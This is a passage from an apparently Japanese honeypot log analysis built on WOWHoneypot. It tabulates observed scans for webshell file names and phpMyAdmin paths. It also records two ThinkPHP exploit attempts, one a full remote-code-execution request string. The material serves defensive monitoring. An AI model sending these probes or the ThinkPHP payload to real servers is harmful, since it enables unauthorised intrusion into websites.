225. | WebShellの探査 | POST /qaz.php HTTP/1.1 | 1 | - | 0 | +1 |
226. | WebShellの探査 | POST /sha.php HTTP/1.1 | 1 | - | 0 | +1 |
227. | WebShellの探査 | POST /ppx.php HTTP/1.1 | 1 | - | 0 | +1 |
228. | WebShellの探査 | POST /conf1g.php HTTP/1.1 | 1 | - | 0 | +1 |
229. | WebShellの探査 | POST /ver.php HTTP/1.1 | 1 | - | 0 | +1 |
230. | WebShellの探査 | POST /hack.php HTTP/1.1 | 1 | - | 0 | +1 |
231. | WebShellの探査 | POST /qa.php HTTP/1.1 | 1 | - | 0 | +1 |
232. | WebShellの探査 | POST /Ss.php HTTP/1.1 | 1 | - | 0 | +1 |
233. | WebShellの探査 | POST /xxx.php HTTP/1.1 | 1 | - | 0 | +1 |
234. | WebShellの探査 | POST /92.php HTTP/1.1 | 1 | - | 0 | +1 |
235. | WebShellの探査 | POST /dexgp.php HTTP/1.1 | 1 | - | 0 | +1 |
236. | WebShellの探査 | POST /nuoxi.php HTTP/1.1 | 1 | - | 0 | +1 |
237. | WebShellの探査 | POST /godkey.php HTTP/1.1 | 1 | - | 0 | +1 |
238. | WebShellの探査 | POST /okokok.php HTTP/1.1 | 1 | - | 0 | +1 |
239. | WebShellの探査 | POST /erwa.php HTTP/1.1 | 1 | - | 0 | +1 |
240. | WebShellの探査 | POST /pma.php HTTP/1.1 | 1 | - | 0 | +1 |
241. | WebShellの探査 | POST /ruyi.php HTTP/1.1 | 1 | - | 0 | +1 |
242. | WebShellの探査 | POST /51314.php HTTP/1.1 | 1 | - | 0 | +1 |
243. | WebShellの探査 | POST /5201314.php HTTP/1.1 | 1 | - | 0 | +1 |
244. | WebShellの探査 | POST /fusheng.php HTTP/1.1 | 1 | - | 0 | +1 |
245. | WebShellの探査 | POST /general.php HTTP/1.1 | 1 | - | 0 | +1 |
246. | WebShellの探査 | POST /repeat.php HTTP/1.1 | 1 | - | 0 | +1 |
247. | WebShellの探査 | POST /ldw.php HTTP/1.1 | 1 | - | 0 | +1 |
248. | WebShellの探査 | POST /s1.php HTTP/1.1 | 1 | - | 0 | +1 |
249. | WebShellの探査 | POST /xiaodai.php HTTP/1.1 | 1 | - | 0 | +1 |
250. | WebShellの探査 | POST /admn.php HTTP/1.1 | 1 | - | 0 | +1 |
251. | WebShellの探査 | POST /hell.php HTTP/1.1 | 1 | - | 0 | +1 |
252. | WebShellの探査 | POST /xp.php HTTP/1.1 | 1 | - | 0 | +1 |
253. | WebShellの探査 | POST /p.php HTTP/1.1 | 1 | - | 0 | +1 |
254. | WebShellの探査 | POST /a.php HTTP/1.1 | 1 | - | 0 | +1 |
255. | WebShellの探査 | POST /m.php HTTP/1.1 | 1 | - | 0 | +1 |
256. | WebShellの探査 | POST /conf.php HTTP/1.1 | 1 | - | 0 | +1 |
257. | WebShellの探査 | POST /123.php HTTP/1.1 | 1 | - | 0 | +1 |
258. | WebShellの探査 | POST /HX.php HTTP/1.1 | 1 | - | 0 | +1 |
259. | WebShellの探査 | POST /666.php HTTP/1.1 | 1 | - | 0 | +1 |
260. | WebShellの探査 | POST /777.php HTTP/1.1 | 1 | - | 0 | +1 |
261. | WebShellの探査 | POST /qwq.php HTTP/1.1 | 1 | - | 0 | +1 |
262. | WebShellの探査 | POST /qwqw.php HTTP/1.1 | 1 | - | 0 | +1 |
263. | WebShellの探査 | POST /.php HTTP/1.1 | 1 | - | 0 | +1 |
264. | WebShellの探査 | POST /infos.php HTTP/1.1 | 1 | - | 0 | +1 |
265. | WebShellの探査 | POST /htfr.php HTTP/1.1 | 1 | - | 0 | +1 |
266. | WebShellの探査 | POST /zzk.php HTTP/1.1 | 1 | - | 0 | +1 |
267. | WebShellの探査 | POST /toor.php HTTP/1.1 | 1 | - | 0 | +1 |
268. | WebShellの探査 | POST /uu.php HTTP/1.1 | 1 | - | 0 | +1 |
269. | WebShellの探査 | POST /aa.php HTTP/1.1 | 1 | - | 0 | +1 |
270. | WebShellの探査 | POST /wb.php HTTP/1.1 | 1 | - | 0 | +1 |
271. | WebShellの探査 | POST /yj.php HTTP/1.1 | 1 | - | 0 | +1 |
272. | WebShellの探査 | POST /7.php HTTP/1.1 | 1 | - | 0 | +1 |
273. | WebShellの探査 | POST /xiaoma.php HTTP/1.1 | 1 | - | 0 | +1 |
274. | WebShellの探査 | POST /xiaomae.php HTTP/1.1 | 1 | - | 0 | +1 |
275. | WebShellの探査 | POST /xiaomar.php HTTP/1.1 | 1 | - | 0 | +1 |
276. | WebShellの探査 | POST /data.php HTTP/1.1 | 1 | - | 0 | +1 |
277. | WebShellの探査 | POST /log.php HTTP/1.1 | 1 | - | 0 | +1 |
278. | WebShellの探査 | POST /fack.php HTTP/1.1 | 1 | - | 0 | +1 |
279. | WebShellの探査 | POST /angge.php HTTP/1.1 | 1 | - | 0 | +1 |
280. | WebShellの探査 | POST /cxfm666.php HTTP/1.1 | 1 | - | 0 | +1 |
281. | WebShellの探査 | POST /db.php HTTP/1.1 | 1 | - | 0 | +1 |
282. | WebShellの探査 | POST /hacly.php HTTP/1.1 | 1 | - | 0 | +1 |
283. | WebShellの探査 | POST /xiaomo.php HTTP/1.1 | 1 | - | 0 | +1 |
284. | WebShellの探査 | POST /xiaoyu.php HTTP/1.1 | 1 | - | 0 | +1 |
285. | WebShellの探査 | POST /xiaohei.php HTTP/1.1 | 1 | - | 0 | +1 |
286. | WebShellの探査 | POST /j.php HTTP/1.1 | 1 | - | 0 | +1 |
287. | WebShellの探査 | POST /qq5262.php HTTP/1.1 | 1 | - | 0 | +1 |
288. | WebShellの探査 | POST /lost.php HTTP/1.1 | 1 | - | 0 | +1 |
289. | WebShellの探査 | POST /php.php HTTP/1.1 | 1 | - | 0 | +1 |
290. | WebShellの探査 | POST /win.php HTTP/1.1 | 1 | - | 0 | +1 |
291. | WebShellの探査 | POST /win1.php HTTP/1.1 | 1 | - | 0 | +1 |
292. | WebShellの探査 | POST /linux.php HTTP/1.1 | 1 | - | 0 | +1 |
293. | WebShellの探査 | POST /linux1.php HTTP/1.1 | 1 | - | 0 | +1 |
294. | WebShellの探査 | POST /cc.php HTTP/1.1 | 1 | - | 0 | +1 |
295. | WebShellの探査 | POST /lanke.php HTTP/1.1 | 1 | - | 0 | +1 |
296. | WebShellの探査 | POST /neko.php HTTP/1.1 | 1 | - | 0 | +1 |
297. | WebShellの探査 | POST /super.php HTTP/1.1 | 1 | - | 0 | +1 |
298. | WebShellの探査 | POST /cere.php HTTP/1.1 | 1 | - | 0 | +1 |
299. | WebShellの探査 | POST /aaa.php HTTP/1.1 | 1 | - | 0 | +1 |
300. | WebShellの探査 | POST /Administrator.php HTTP/1.1 | 1 | - | 0 | +1 |
301. | WebShellの探査 | POST /liangchen.php HTTP/1.1 | 1 | - | 0 | +1 |
302. | WebShellの探査 | POST /meng.php HTTP/1.1 | 1 | - | 0 | +1 |
303. | WebShellの探査 | POST /no.php HTTP/1.1 | 1 | - | 0 | +1 |
304. | WebShellの探査 | POST /mysql.php HTTP/1.1 | 1 | - | 0 | +1 |
305. | WebShellの探査 | POST /Updata.php HTTP/1.1 | 1 | - | 0 | +1 |
306. | WebShellの探査 | POST /xxxx.php HTTP/1.1 | 1 | - | 0 | +1 |
307. | WebShellの探査 | POST /coon.php HTTP/1.1 | 1 | - | 0 | +1 |
308. | WebShellの探査 | POST /zxc0.php HTTP/1.1 | 1 | - | 0 | +1 |
309. | WebShellの探査 | POST /zxc2.php HTTP/1.1 | 1 | - | 0 | +1 |
310. | WebShellの探査 | POST /indexa.php HTTP/1.1 | 1 | - | 0 | +1 |
311. | WebShellの探査 | POST /lx.php HTTP/1.1 | 1 | - | 0 | +1 |
312. | WebShellの探査 | POST /cn.php HTTP/1.1 | 1 | - | 0 | +1 |
313. | WebShellの探査 | POST /index1.php HTTP/1.1 | 1 | - | 0 | +1 |
314. | WebShellの探査 | POST /info.php HTTP/1.1 | 1 | - | 0 | +1 |
315. | WebShellの探査 | POST /info1.php HTTP/1.1 | 1 | - | 0 | +1 |
316. | WebShellの探査 | POST /aaaaaa1.php HTTP/1.1 | 1 | - | 0 | +1 |
317. | WebShellの探査 | POST /up.php HTTP/1.1 | 1 | - | 0 | +1 |
318. | WebShellの探査 | POST /fb.php HTTP/1.1 | 1 | - | 0 | +1 |
319. | WebShellの探査 | POST /cnm.php HTTP/1.1 | 1 | - | 0 | +1 |
320. | WebShellの探査 | POST /51.php HTTP/1.1 | 1 | - | 0 | +1 |
321. | WebShellの探査 | POST /cadre.php HTTP/1.1 | 1 | - | 0 | +1 |
322. | WebShellの探査 | POST /mm.php HTTP/1.1 | 1 | - | 0 | +1 |
323. | WebShellの探査 | POST /1q.php HTTP/1.1 | 1 | - | 0 | +1 |
324. | WebShellの探査 | POST /1111.php HTTP/1.1 | 1 | - | 0 | +1 |
325. | WebShellの探査 | POST /errors.php HTTP/1.1 | 1 | - | 0 | +1 |
326. | phpMyAdminの探査 | GET /s/index.php HTTP/1.1 | 1 | - | 0 | +1 |
327. | phpMyAdminの探査 | GET /phpMyAdmins/index.php HTTP/1.1 | 1 | - | 0 | +1 |
328. | phpMyAdminの探査 | GET /mysql/sqlmanager/index.php HTTP/1.1 | 1 | - | 0 | +1 |
329. | ThinkPHPの探査 | GET /TP/public/index.php HTTP/1.1 | 1 | - | 0 | +1 |
330. | ThinkPHPの脆弱性を利用した攻撃(参照) | GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1 | 1 | - | 0 | +1 |
331. | ThinkPHPの脆弱性を利用した攻撃(参照) | POST /TP/public/index.php?s=captcha HTTP/1.1 | 1 | - | 0 | +1 |
332. | 不明 | GET /825256118F24664C77F161AB6ADA62D7.php HTTP/1.1 | 1 | - | 0 | +1 |
WOWHoneypotで取得したログの簡易分析は以上です。